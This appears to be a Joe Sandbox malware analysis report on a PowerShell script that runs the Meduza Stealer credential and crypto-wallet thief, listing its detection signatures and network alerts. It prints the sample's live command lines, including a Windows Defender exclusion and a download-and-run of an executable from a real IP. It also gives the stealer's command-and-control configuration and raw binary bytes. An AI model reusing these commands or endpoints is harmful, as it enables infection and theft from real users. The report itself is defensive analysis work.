Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
script.ps1

Overview

General Information

Sample name:script.ps1
Analysis ID:1578093
MD5:129bf31d3dc155699387ccc33f2f3775
SHA1:1f43dcd5742a8f0b499892fd3e09255378817adc
SHA256:b1d2df274b2539ad80debafc925c0cf6a2c2394093e57a8e1d0023d3fc13dba3
Tags:DLLHijackMeduzaStealerps1user-NDA0E
Infos:

Detection

CredGrabber, Meduza Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CredGrabber
Yara detected Meduza Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Launcher.exe (PID: 1848 cmdline: "C:\Windows\Temp\Launcher.exe" MD5: 2696D944FFBEF69510B0C826446FD748)
      • powershell.exe (PID: 4164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 576 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 7264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xdnfl52f.civ.exe (PID: 7512 cmdline: "C:\Windows\Temp\xdnfl52f.civ.exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)
  • cleanup
{"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\xdnfl52f.civ.exeJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
      Process Memory Space: xdnfl52f.civ.exe PID: 7512JoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
        Process Memory Space: xdnfl52f.civ.exe PID: 7512JoeSecurity_CredGrabberYara detected CredGrabberJoe Security
          SourceRuleDescriptionAuthorStrings
          10.0.xdnfl52f.civ.exe.7ff75a670000.0.unpackJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security
            10.2.xdnfl52f.civ.exe.7ff75a670000.0.unpackJoeSecurity_MeduzaStealerYara detected Meduza StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 4164, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 4164, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", ProcessId: 7264, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 4164, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", ProcessId: 6152, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", ProcessId: 7264, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 4164, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", ProcessId: 7264, ProcessName: powershell.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Temp\Launcher.exe" , ParentImage: C:\Windows\Temp\Launcher.exe, ParentProcessId: 1848, ParentProcessName: Launcher.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'", ProcessId: 7264, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1", ProcessId: 6152, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:53:04.832885+010020494411A Network Trojan was detected192.168.2.549709193.3.19.15115666TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:53:04.832885+010020508061A Network Trojan was detected192.168.2.549709193.3.19.15115666TCP
              2024-12-19T08:53:04.952744+010020508061A Network Trojan was detected192.168.2.549709193.3.19.15115666TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:53:04.832885+010020508071A Network Trojan was detected192.168.2.549709193.3.19.15115666TCP
              2024-12-19T08:53:04.952744+010020508071A Network Trojan was detected192.168.2.549709193.3.19.15115666TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:52:42.649350+010028032742Potentially Bad Traffic192.168.2.549704147.45.47.1580TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://147.45.47.15/duschno.exeAvira URL Cloud: Label: malware
              Source: http://147.45.47.15/Launcher.exeAvira URL Cloud: Label: malware
              Source: http://147.45.47.15/iviewers.dllAvira URL Cloud: Label: malware
              Source: 10.2.xdnfl52f.civ.exe.7ff75a670000.0.unpackMalware Configuration Extractor: Meduza Stealer {"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}
              Source: C:\Windows\Temp\iviewers.dllReversingLabs: Detection: 26%
              Source: C:\Windows\Temp\xdnfl52f.civ.exeReversingLabs: Detection: 83%
              Source: script.ps1Virustotal: Detection: 13%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
              Source: C:\Windows\Temp\xdnfl52f.civ.exeJoe Sandbox ML: detected
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E7BA0 CryptUnprotectData,LocalFree,10_2_00007FF75A6E7BA0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A7C20 CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6A7C20
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A3A30 BCryptDestroyKey,10_2_00007FF75A6A3A30
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E8020 BCryptDecrypt,BCryptDecrypt,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6E8020
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E7EC0 CryptProtectData,LocalFree,10_2_00007FF75A6E7EC0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E83C0 BCryptCloseAlgorithmProvider,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6E83C0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E8440 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,10_2_00007FF75A6E8440
              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: Binary string: OLEView.pdb source: Launcher.exe, Launcher.exe, 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Launcher.exe.0.dr
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72B500 FindClose,FindFirstFileExW,GetLastError,10_2_00007FF75A72B500
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72B5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,10_2_00007FF75A72B5B0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F73F0 GetLogicalDriveStringsW,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6F73F0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\migration\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\migration\wtr\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.5:49709 -> 193.3.19.151:15666
              Source: Network trafficSuricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.5:49709 -> 193.3.19.151:15666
              Source: global trafficTCP traffic: 192.168.2.5:49709 -> 193.3.19.151:15666
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:42 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 13:27:42 GMTETag: "1800-6298b60de3f6f"Accept-Ranges: bytesContent-Length: 6144Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 93 65 61 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 0c 00 00 00 08 00 00 00 00 00 00 ae 2b 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 40 00 00 28 00 00 00 5c 2b 00 00 4f 00 00 00 00 60 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 0b 00 00 00 20 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 56 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 03 00 00 00 60 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:42 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 13:27:42 GMTETag: "325e0-6298b60deeb4f"Accept-Ranges: bytesContent-Length: 206304Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 48 02 00 f0 00 00 00 00 60 02 00 90 96 00 00 00 00 00 00 00 00 00 00 00 04 03 00 e0 21 00 00 00 00 03 00 18 2a 00 00 f0 9e 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 9f 00 00 18 00 00 00 48 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 6c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 14 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 0e 00 00 00 30 02 00 00 08 00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 2c 1d 00 00 00 40 02 00 00 1e 00 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 96 00 00 00 60 02 00 00 98 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 2a 00 00 00 00 03 00 00 2c 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 